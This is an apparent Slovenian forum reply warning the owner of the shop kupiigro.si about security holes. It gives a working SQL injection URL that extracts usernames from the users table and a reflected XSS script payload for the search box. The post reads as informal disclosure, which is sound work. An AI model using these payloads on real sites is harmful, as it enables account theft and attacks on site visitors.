Jaz bi najpraj poslihtal SQL injection, ki sem ga nasel v prvih 30s ko sem prisel na stran.
http://kupiigro.si/index.php?m=product&game_id=237 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,concat(username),35,46 from users limit 1,1--&g=1/sims-2-pets-psp
Vrjetno se bi z malo truda dalo dobiti geslo ampak nevem nisem imel srece z information_schema.columns ugibati se mi pa tudi ni dalo.Ampak je pa to zelo resna zadeva.
Aja pa XSS v search boxu tudi postimaj, ker se zna zgoditi, da bi kaksen bad guy lahko to uporabljal za redirect ali iframe in bi se tvoja stran lahko hitro znajdla na googlovi listi nevarnih strani
http://kupiigro.si/index.php?search="><script>alert(123);</script>&poslji=\
Verjetno je se kaj ampak to je moj 5minutni pregled.
Cheers.